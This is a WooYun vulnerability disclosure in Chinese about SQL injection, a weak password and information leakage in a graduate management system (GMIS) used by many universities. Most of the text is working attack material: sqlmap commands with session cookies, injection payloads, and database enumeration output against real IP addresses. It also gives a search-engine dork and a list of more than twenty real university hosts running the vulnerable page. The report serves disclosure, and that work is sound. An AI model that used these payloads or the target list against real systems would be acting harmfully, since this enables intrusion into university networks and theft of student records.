当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-056622

漏洞标题:某管理系统多个SQL注入+弱口令+信息泄露

相关厂商:cncert国家互联网应急中心

漏洞作者: Mr.leo

提交时间:2014-04-11 11:41

修复时间:2014-07-07 11:42

公开时间:2014-07-07 11:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-11: 细节已通知厂商并且等待厂商处理中
2014-04-16: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-06-10: 细节向核心白帽子及相关领域专家公开
2014-06-20: 细节向普通白帽子公开
2014-06-30: 细节向实习白帽子公开
2014-07-07: 细节向公众公开

简要描述:

某管理系统多个SQL注入+弱口令+信息泄露(系统厂商见详细说明)

详细说明:

南京南软科技有限公司旗下的研究生管理系统
首先找1个弱口令实例证明下,用户名密码都是1
http://210.41.218.62:8080/gmis/login.aspx

000.jpg


128.jpg


注入点1:
sqlmap跑起来,需要说明的,考虑到cookie可能存在过期时间,验证的话需要自行抓取cookie参数加入sqlmap,审核的同学应该知道怎么做。
xq参数没有过滤,导致注射
sqlmap.py -u "http://210.41.218.62:8080/gmis/pygl/kbcx_jsprint.aspx?xq=19&xqmc=2013-2014春学期" -p "xq" --cookie ASP.NET_SessionId=gdg5xyfrpc5ehh450d1mez55
sqlmap identified the following injection points with a total of 75 HTTP(s) requests:
---
Place: GET
Parameter: xq
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: xq=19' AND 8883=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(117)+CHAR(119)+CHAR(58)+(SELECT (CASE WHEN (8883=8883) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(99)+CHAR(120)+CHAR(114)+CHAR(58))) AND 'mGrS'='mGrS&xqmc=2013-2014春学期
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: xq
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: xq=19' AND 8883=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(117)+CHAR(119)+CHAR(58)+(SELECT (CASE WHEN (8883=8883) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(99)+CHAR(120)+CHAR(114)+CHAR(58))) AND 'mGrS'='mGrS&xqmc=2013-2014春学期
---
current user: 'gmissa'
current database: 'Gmis31'
available databases [7]:
[*] distribution
[*] Gmis31
[*] master
[*] model
[*] msdb
[*] tempdb
[*] wznew

235.jpg


注入点2:
sqlmap跑起来,需要说明的,考虑到cookie可能存在过期时间,验证的话需要自行抓取cookie参数加入sqlmap,审核的同学应该知道怎么做。
xh参数没有过滤,导致注射
sqlmap.py -u "http://210.41.218.62:8080/gmis/cjgl/zqsxshView.aspx?xh=2007B031" --cookie ASP.NET_SessionId=kcnqmc55ju4polzjg4fmf055
sqlmap identified the following injection points with a total of 66 HTTP(s) requests:
---
Place: GET
Parameter: xh
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: xh=2007B031' AND 5293=5293 AND 'AMBs'='AMBs
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: xh=2007B031' AND 7187=CONVERT(INT,(CHAR(58)+CHAR(106)+CHAR(119)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (7187=7187) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(119)+CHAR(109)+CHAR(113)+CHAR(58))) AND 'IocF'='IocF
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: xh
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: xh=2007B031' AND 5293=5293 AND 'AMBs'='AMBs
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: xh=2007B031' AND 7187=CONVERT(INT,(CHAR(58)+CHAR(106)+CHAR(119)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (7187=7187) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(119)+CHAR(109)+CHAR(113)+CHAR(58))) AND 'IocF'='IocF
---
current user: 'gmissa'
current database: 'Gmis31'
available databases [7]:
[*] distribution
[*] Gmis31
[*] master
[*] model
[*] msdb
[*] tempdb
[*] wznew

445.jpg


注入点3:
sqlmap跑起来,需要说明的,考虑到cookie可能存在过期时间,验证的话需要自行抓取cookie参数加入sqlmap,审核的同学应该知道怎么做。
http://210.41.218.62:8080/gmis/tzgg/tzggdel.aspx
post数据中的2个参数没有过滤(jssj和kssj),导致注射。

628.jpg


653.jpg


728.jpg


751.jpg


注入点4:
post数据中的1个参数没有过滤,txtbxh,导致注射。
POST http://210.41.218.62:8080/gmis/pygl/wxydbglist_dssh.aspx

906.jpg


928.jpg


未授权访问导致信息泄露:
百度搜索关键字 inurl:/Gmis/xkjsb/yjsdsfc.aspx?id=

025.jpg


http://202.206.48.96:8080/gmis/xkjsb/yjsdsfc.aspx?id=0144
http://yjsy.cqmu.edu.cn:8080/gmis/xkjsb/yjsdsfc.aspx?id=100800
http://yjs.xzmc.edu.cn:8080/gmis/xkjsb/yjsdsfc.aspx?id=n0101
http://202.4.152.190:8080/gmis/xkjsb/yjsdsfc.aspx?id=2013500076

漏洞证明:

另外一个参数的注入点:
http://210.41.218.62:8080/gmis/leftmenu.aspx?ma=40
http://yjsg.usts.edu.cn/gmis/leftmenu.aspx?ma=40
http://211.64.205.214/gmis/leftmenu.aspx?ma=40
http://101.76.99.20/gmis/leftmenu.aspx?ma=40
http://202.194.48.107/gmis/leftmenu.aspx?ma=40
http://202.206.64.221:8080/gmis/leftmenu.aspx?ma=40
http://218.199.176.137/gmis/leftmenu.aspx?ma=40
http://yjs.htu.edu.cn/gmis/leftmenu.aspx?ma=40
http://218.195.96.52/gmis/leftmenu.aspx?ma=40
http://gims.sues.edu.cn/gmis/leftmenu.aspx?ma=40
http://yjsy1.ustb.edu.cn:8080/gmis/leftmenu.aspx?ma=40
http://gmis.swu.edu.cn:8088/gmis/leftmenu.aspx?ma=40
http://yjsxt.sta.edu.cn/gmis/leftmenu.aspx?ma=40
http://202.121.199.182:8080/gmis/leftmenu.aspx?ma=40
http://210.43.126.80:8080/gmis/leftmenu.aspx?ma=40
http://yjsjw.hzau.edu.cn/gmis/leftmenu.aspx?ma=40
http://211.71.36.110/gmis/leftmenu.aspx?ma=40
http://202.119.160.171/gmis/leftmenu.aspx?ma=40
http://101.76.160.65/gmis/leftmenu.aspx?ma=40
http://61.187.179.68:8080/gmis/leftmenu.aspx?ma=40
http://202.114.144.61/gmis/leftmenu.aspx?ma=40
http://gmis.cup.edu.cn/gmis/leftmenu.aspx?ma=40
找3个实例,
1,http://210.41.218.62:8080/gmis/leftmenu.aspx?ma=40
ma参数存在注入
Place: GET
Parameter: ma
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ma=40' AND 7549=7549 AND 'YsIH'='YsIH
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAV
Payload: ma=40' AND 6772=CONVERT(INT,(CHAR(58)+CHAR(112)+CHAR(117
+CHAR(58)+(SELECT (CASE WHEN (6772=6772) THEN CHAR(49) ELSE CHAR(48)
58)+CHAR(113)+CHAR(114)+CHAR(98)+CHAR(58))) AND 'jykP'='jykP
---
[19:01:11] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4
back-end DBMS: Microsoft SQL Server 2005
[19:01:11] [INFO] fetching current user
[19:01:32] [INFO] retrieved: gmissa
current user: 'gmissa'
[19:01:32] [INFO] fetching current database
[19:01:54] [INFO] retrieved: Gmis31
current database: 'Gmis31'
[19:01:54] [INFO] fetching database names
[19:02:15] [INFO] the SQL query used returns 7 entries
[19:02:37] [INFO] retrieved: distribution
[19:02:58] [INFO] retrieved: Gmis31
[19:03:20] [INFO] retrieved: master
[19:03:42] [INFO] retrieved: model
[19:04:03] [INFO] retrieved: msdb
[19:04:25] [INFO] retrieved: tempdb
[19:04:46] [INFO] retrieved: wznew
available databases [7]:
[*] distribution
[*] Gmis31
[*] master
[*] model
[*] msdb
[*] tempdb
[*] wznew
2,http://211.64.205.214/gmis/leftmenu.aspx?ma=40

604.jpg


3,http://202.114.177.191/gmis/leftmenu.aspx?ma=40

635.jpg

修复方案:

1、过滤参数
2、加强验证

版权声明:转载请注明来源 Mr.leo@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-07-07 11:42

厂商回复:

最新状态:

2014-04-16:CNVD确认并在多个实例上确认所述情况(由上海交通大学网络信息中心协助验证完成),由CNCERT向教育网应急组织通报漏洞情况,并抄报给南软公司官方网站邮箱